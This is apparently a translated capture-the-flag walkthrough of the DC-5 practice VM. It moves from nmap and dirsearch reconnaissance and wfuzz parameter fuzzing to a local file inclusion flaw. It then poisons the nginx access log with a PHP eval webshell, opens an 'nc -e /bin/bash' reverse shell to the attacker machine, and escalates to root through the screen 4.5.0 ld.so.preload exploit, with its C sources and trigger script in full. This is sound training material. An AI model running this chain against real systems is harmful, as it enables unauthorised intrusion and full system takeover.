#Download and install process
Download link: Link: https://pan.baidu.com/s/1IyhlH4k-fcz6ze6TscUYJg?pwd=ibiy
Extraction code: ibiy
1. Turn on the VM
click retry
Change bridge mode to nat
Click to start the virtual machine
choose yes
Seeing login means that the login is successful
1. Information collection
(1) Use nmap to determine the IP address of the Dc-5 host
nmap -sP 192.168.222.0/24
Here, since my network segment is 222, I use nmap -sP 192.168.222.0/24 to scan the surviving hosts on the entire network segment
Write as much as your network segment is, for example, if your network segment is 192.168.111.xxx. You just write 192.168.111.0/24 and so on.
Since our Dc-5 was built later, the dhcp usually assigns the latter, which is the largest value, when it is allocated. The largest value here is 185, so I initially judged that the ip address of dc-5 is 192.168.222.185
(2) Port scanning for 192.168.222.185
nmap -sV 192.168.222.185
Detailed version scanning of ip addresses
Found development ports 80, and 111.
80 is the web service port at first glance, so we can directly access it.
Why do we not choose to go to port 111 here?
Because I was very excited when I saw the 111 port at the beginning. After a series of tests, I found that the 111 port was just a trick, so you should not go there.
(3) Visit 192.168.222.185:80
After observing the first four pages, it was found that there was no suspicious use point.
Know to come to the fifth page. Found that he has a similar form.
Then just write some data and submit it
It was found that he would jump to an interface with thnk.you.php. And pass the value we just entered as a parameter.
So when passing parameters, I think here that since there is a place for data interaction, will there be sql injection and xss vulnerabilities here.
The trigger condition of xss is that the other party must trigger this condition, and we cannot achieve it, so I chose sql injection. But when I was injecting sql, I first used sqlmap to run, but found that it didn't. So I chose manual testing, and I still didn't find any loopholes during manual testing. But I found a problem when I injected manually. I just found that there is a place on the page that has been refreshing and changing, and it changes every time I submit it.
(4) Submit the form, "Copyright © 2020" is always changing
first commit
Below is Copyright © 2018
again for the second commit
Second Submission Below is Copyright © 2019
So how did this opyright © 2019 come about? Why did it change?
Look at the following picture
1. Generally, we will call the green part the header or the navigation bar
2. Call the yellow content content
3. The blue part is called the footer
4. Sometimes we find that in many pages, the navigation bar or footer may be written and included in other pages, because these two pages are the same, for example, I have 10 pages , the footer and navbar are the same for all 10 pages.
5. In this case, developers can write these two pages in advance. For example, for the navigation bar, developers usually use head.php or nav.php to order. As for the footer, developers often name it with footer.php or foot.php. So what's his name we'll just have to guess
If his overall page is called thankyou.php, how should we complete it in the code?
look at the following pictures
Suppose we want to complete thankyou.php in the code, if the navigation bar and footer are ready-made, the general developer will use include to include, for example, his navigation bar is called head, then the development will include(' head.php'), for example, if its footer is called foot.php, then the developer will inclde('foot.php'). In this way, we don't need to write the navigation bar and footer, just call it directly. But this is just our guess. In order to be able to reuse, we can do file inclusion.
And when we refresh the page, we will find that it has been changing here.
Well, if he writes it to death, for example, what he writes to death is "Copyright © 2017", then he will not keep changing this Copyright © 2017, one will become 2017 and the other will become 2020..., so according to him Judging by the effect of the page, it is highly suspected that there is such a file as include('foot.php'). But the file at the bottom, that is, the file at the end of the page, we don't know whether his file is called foot.php or footer.php or other file names. Of course, this is just my suspicion, he just contains the file, so he can be sure after trying. So if you suspect that the file contains he needs to pass parameters, how should the parameters be written? Generally, the parameters should be written as thankyou.php?file=foot.php. But both file and foot.php are our assumed parameter names. file is our hypothetical key name, and foot.php is also our hypothetical key value. So if it is assumed that he is the thankyou.php?file=foot.php we set. Then foot.php is the value passed in, so it can be included in the file. So there may be file passing parameters here, so if there is parameter passing, it will be easy to handle at this time, then it means that there must be a file inclusion vulnerability. But the above are all our guesses. Whether he adopted the method we assumed, we need to keep trying. Now we need to try to guess what the file name of his footer file is
(5) Use Yujian background scanning tool or dirsearch to detect the directory
Installation and use of dirsearch - Programmer Sought
Order:
python dirsearch.py -u your DC-5 ip address
(Because my system suddenly crashed in the afternoon and the ip was reassigned, I am afraid that some beginners will not understand me. I will make a note here. Yujian just found out that it is gone. You can install it yourself. You can also just use dirsearch , I use two for double insurance, to see if there are other things that have not been scanned, so I use two.)
Note here, he scanned out a footer.php. visit him
Refresh the page again, we can see that his changes are more familiar with our changes in thankyou.php
It is suspected that footer.php is included in the thank.you.php file, and it can be passed in by passing parameters.
So now we know the path and file name, and the key value, but we still have nothing to do with the key name
url composed of known information
thankyou.php?xxx=footer.php。
So in the next step we have to guess the xxx key name
(6) Use manual or fuzz to guess the key name.
Use the fuzz that comes with kali:
First of all, we must first determine the files that already exist on this website, such as index.php, and solutions.php.
I already know that his key name is file.
##http://192.168.189.129/thankyou.php?file=index.php
First visit this url
This is the interface of thankyou.php, the key name is file. The key value is index.php.
The key point is index.php because index.php is a file that is sure to exist. If there is a loophole in the file, then our index.php will definitely be included.
Pay attention to this picture, the green part is our original thankyou.php interface. And the red part is the interface of index.php. So how did this interface come about? It is through our ##http://192.168.189.129/thankyou.php?file= index.php , where the parameters are passed in, and the code of index.php on the homepage is placed in thankyou. The php interface is analyzed.
If we know the key name file above, how do we change it if we don't know the key name?
Use the wfuzz tool kali comes with
Open kali, enter directly in the kali terminal: wfuzz
Command: FUZZ
If an error is reported here, you can switch root to use
Order:
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.189.129/thankyou.php?FUZZ=index.php
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.189.129/thankyou.php?FUZZ=index.php wfuzz:程序 -w :指定文件 /usr/share/wfuzz/wordlist/general/common.txt:这个文件是系统自带的,用就行了 http://192.168.189.129:你自己设置DC-5的ip地址 thankyou.php?FUZZ=index.php :确定网站目录下有个存在的文件index.php 用FUZZ这个关键词当作一个未知的东西,然后使用 /usr/share/wfuzz/wordlist/general/common.txt 这里的字典, 放在FUZZ的位置上不断的去跑。如果还你不理解的话 ,你就把fuzz这个当作为bp中你设置的变量, /usr/share/wfuzz/wordlist/general/common.txt就是你指定的爆破字典
Look at this result. The apparent value is different from the other values. So we pass the keyword is file.
Or you can use fuzz's dictionary. Then use bp to run
Copy the fuzz dictionary directly.
Open bp to access this url, capture packets
sent to the Intruder module
Set fuzz to a variable
Load the fuzz dictionary you just copied
click start
manual:
The url address has a feature key name that contains vulnerabilities:
?file=
?filename=
?home=
?path=
?page=
We can test based on these common key names.
Say I use ?file. Then the url for testing should be:
#####http://192.168.189.129/thankyou.php?file=footer.php
The above determined key name is file
2. Infiltration begins
(1) Use the file inclusion vulnerability to read the /etc/passwd directory
url:##http://192.168.189.129/thankyou.php?file=/etc/passwd
It means that now we get the user information on the server through file inclusion.
But just to see the information, our goal is to use the webshell tool to control it, but we can see from the previous page that there is no place to upload it. So what should we do? We can think about it carefully. In the previous information collection process, the information we collected was the server of nginx. Regardless of whether it is a server such as nginx or apche, they all have server log records, and they all There is a default path. For example, nginx is /var/log/nginx/access.log, apahce is /var/log/apache/access.log, as long as he has not modified it, we can access his log. It doesn't matter whether you access acces.log or error.log
So what is the significance of the access log, and what does it have to do with uploading the webshell?
We know that if we visit a non-existing directory webpage, a 404 error will occur, and the error information will be recorded in the access.log log, so we can use this idea. We deliberately write a wrong directory, and then add a sentence of code behind it. For example, http://xxxx/ok <?php @eval($_POST['x'])?>, then he will record the entire error message in the log, just like we wrote ok <?php @ eval($_POST['x'])?>, since it will be recorded in the log, is the log in his server, as long as our written code can be successfully parsed, we can successfully implant the backdoor.
Notice :
Whether you visit /var/log/nginx/access.log or /var/log/nginx/error.log here , you need to pay attention to access, log is the log that records your various requests, such as 200, 404 , 306, etc. can be recorded. When uploading webshell, you can write a file that does not exist, or just write a sentence of Trojan horse. Then you can see it when you visit /var/log/nginx/ access.log , such as http:xxxx/wsxcwe<?php @eval(@_POST['x'])?>, it can also be parsed successfully . But if the place where you access and upload webshell is /var/log/nginx/error.log , then you need to write an existing file, such as http://xxxx/thanyou.php?xx<?php @eval($_ POST ['x']) ? >, you can see the record you wrote in /var/log/nginx/error.log
(2) Determine whether there is a default log path
url:#http://192.168.189.129/thankyou.php?file=/var/log/nginx/access.log
It can be seen from the page that his default log path has not been changed, and it will give us the returned results.
(3) Write a sentence Trojan horse
Turn on bp packet capture and send data packets.
What needs to be noted here is that you do not directly enter a word of Trojan horse in the url, or it will be encoded by the url!
Intercept it in bp and write a sentence of code in it! ! !
(4) Access log directory
Pay attention here. At this point our one-sentence Trojan horse has been written into it. Why is <?php @eval($_POST['x'])?> not displayed, indicating that the code has been executed and parsed successfully.
(5) Use Ant Sword to connect
The reason why the kitchen knife is not recommended here is that the kitchen knife can only be connected to windos, while the ant sword can be cross-platform. So choose Ant Sword
The address of url is the log address where your Trojan horse is recorded. If you are recorded by access.log, write the address of access.log. If you are erro.log, write the address of erro.log.
The password is the parameter set by your one-word password, and I set x. I just write x.
At this point the connection is successful. Successfully entered the web directory of the dc-5 shooting range
Let's check the directory. It is found that some directories can be viewed successfully.
But when you look at the root directory, you can't see it, suggesting that we don't have root permissions.
(6) Right-click to use the Ant Sword terminal, and enter the whoami command
Enter whoami
We found that we are currently only website users, not root users.
So currently we can only access the web server, and the operations to be performed are also limited. Because we are not a root user, but a www-data, just a website user, since we have no operation authority, we can only escalate the authority and perform system penetration
(7) For the convenience of operation, Yijian bounces the shell to Kali, connects the shell to Kali, and performs subsequent operations.
The purpose of the connection is because there are more tools on kali
(8) Turn on monitoring on kali, and enter the command nc-lvvp 1234 in the terminal
Command: nc-lvvp 1234
This means that port 1234 is started on kali, waiting for dc-5 to connect him.
Little review:
Generally, the forward connection refers to the connection between the attack aircraft and the target aircraft.
The reverse connection refers to the attack aircraft starts monitoring and waits for the connection of the target aircraft. (It is used more often, nc is a reverse connection tool)
(9) Enter the command in Ant Sword to execute nc -e/bin/bash 192.168.189.130 1234
Command: nc -e/bin/bash Your kail's ip address is 1234
If connect appears, it means the connection is successful.
(10) Enter python -c 'import pty;pty.spawn("/bin/bash")' on kali [start an interactive shell through python]
At this time, both Kali and Ant Sword can connect to DC-5.
Order:
python -c 'import pty;pty.spawn("/bin/bash")'
So what is interaction?
That is, whether you enter whomi or id, he will have corresponding results.
Then connecting to dc-5 through kali is the same as connecting to dc-5 through ant sword, that is, the real machine can control dc-5, and our kali can also control dc-5. So if we only look at the command line tools, the functions of the two are duplicated, so since we can connect to the virtual terminal in Ant Sword, why do we need kali?
Because kali itself has more attack tools and more comprehensive scripts. There are no more tools in Ant Sword, so we still need to operate according to Kali in the next steps. After combining the two, our ultimate goal is to obtain the management authority of dc-5.
(11) find the file with SUID, and the file is used to raise the right.
命令:find / -perm -u=s -type f 2>/dev/null
find / : means I want to find in the whole operating system
-perm -u=s: Represents the authority to find suid files
-type f: represents a file
2>/dev/null: 2 called an error output, output to /dev, we know that dev is a device, and null means no device, in other words, I don’t display any error output
The files listed above are all files with suid permissions, which means that we have to do related operations on these files
In these files, we mainly use /bin/screen-4.5.0
screen is a software, this software has loopholes, and this software has been installed in dc-5, we can use the screen software installed on dc-5 to escalate rights.
Why is it sure that the screen has a loophole?
You can find it by searching online.
(12) Re-open a terminal, and use the searchsploit tool to view the vulnerability of screen-4.5.0 in kali
Be careful here! Re-open a new terminal, don't use our previous terminal to operate! ! ! !
Instruction: searchsploit screen 4.5.0
Replenish:
"searchsploit" is a command-line search tool for Exploit-DB that helps us find exploit modules.
Exploit-DB is a vulnerability database. A copy of the vulnerability database is saved in Kali Linux. You can use the command mentioned above to find the required penetration module. It will search for all vulnerabilities and shellcodes and the vulnerability database is stored locally. Yes, it can also be used without a network.
The basic search method is searchsploit+ software/systems that may contain vulnerabilities, etc., corresponding to echoing the existing vulnerabilities and scripts used for penetration.
For details, please refer to: Searchsploit uses_Blankup's Blog-CSDN Blog
After the red box is selected, there is a (Poc) written on it. Poc is for verification, verifying whether there is such a vulnerability in our target, but it will not attack, it is only related verification. If you want to attack, you must choose the green one above, it is an exp script, this script is 41154.sh , we can use it to attack. Then the result of the attack on screnn4.5.0 is to escalate the rights, that is, to escalate the rights to dc-5, and get the root authority of dc-5!
(13) Copy the vulnerability script to the current directory
Command: searchsploit -m 41154
If the above content appears, the copying is successful.
(14) View the contents of the 41154.sh file
Command: cat 41154.sh
Script for sreent.
(14) The copied script cannot be executed, so it needs to be split into multiple files for processing. Create a new file under the root folder of kali, the command is libhax.c. Copy the first part of the 41154.sh script to the libhax.c file
(15) Copy the selected content in the script to the libhax.c file
Contents of libhax.c: (first file)
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
(16) Save the libhax.c file ctrl s, then open the terminal window, and execute the command in the terminal window
Command: gcc -fPIC -shared -ldl -o libhax.so libhax.c
Used to produce dynamic library file libhax.so
.so is a library file, -o means output, use .c file to generate .so file
ignore this warning
Use ls to view.
libhax.so represents successful generation.
This is the first file, which is generated by compiling the .c file
(17) Create a new file under the root folder of kali, named rootshell.c, to process the second part of the script
(18) Copy the selected part of the 41154.sh script to the rootshell.c file
(19) In the rootshell.c file, add the statement #include<unistd.h> in the second line, and delete a redundant NULL in the penultimate line of the file
The file content of rootshell.c: (the second file content)
#include <stdio.h>
#include <unistd.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL);
}
(20) Save and exit the rootshell.c file. In the terminal window of kali, enter the command gcc -o rootshell rootshell.c to generate an executable binary file
At this point we use the .c file to generate the binary file successfully
命令:gcc -o rootshell rootshell.c
(21) Create a new dc5.sh file
(22) Copy the last part of the 41154.sh script to the dc5.sh file
Copy to the dc5.sh file
ctrl s to save and exit.
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
If you want to escalate your rights, you need to upload the three files libhax.so, rootshell, and dc5.sh to the dc-5 shooting range.
(23) Copy the three files libhax.so, rootshell, and dc5.sh in kali to any folder in windos.
Here I put these three files in the root directory, if you have the following situation
You just copy these three files to Kali's desktop first
Then copy these three files from the desktop to winods
(24) Open Ant Sword, find the /tmp directory, and right-click to upload the file.
Find the /root directory and find the tmp directory under the root directory
right click to upload file
Upload these three files.
By uploading to the dc-5 shooting range
(25) In the window of the kali rebound shell, view the file just uploaded by Ant Sword
Command: ls /tmp
You can also watch it in the virtual terminal of Ant Sword
Anyway, as long as these three files appear.
(26) Enter the /tmp directory in the window hole of the kali rebound shell, and add executable permissions to the dc5.sh file
Command: cd /tmp
Go to tmp first.
Command: chmod +x dc5.sh
Add executable permissions to the dc5.sh file
(27) execute dc5.sh
Command: ./dc5.sh
Appears # means success
Points to note:
When I was working here, I kept reporting an error, which was an error similar to /lib64/libc.so.6: version GLIBC_2.XX' not found. I did it 4 times from start to finish and always thought something was wrong. I used the 22-year version of kali for the first and second time, and this error occurred. Later, I changed to kali for 23 years and still had this error. Until the fourth time I used kali for 21 years and he was able to perform normally.
So if this problem occurs when you do this, you can directly choose to switch to the 2021 version of kali. It should also be noted that after switching to Kali in 2021, log in directly with the root account for experiments!
(28) Visit the root directory of the dc-5 shooting range to find the flag
Command: cd /root
Switch to the root directory
View thisistheflag.txt this file
Instruction: cat thisistheflag.txt
Seeing the above interface means success. You took the flag! ! !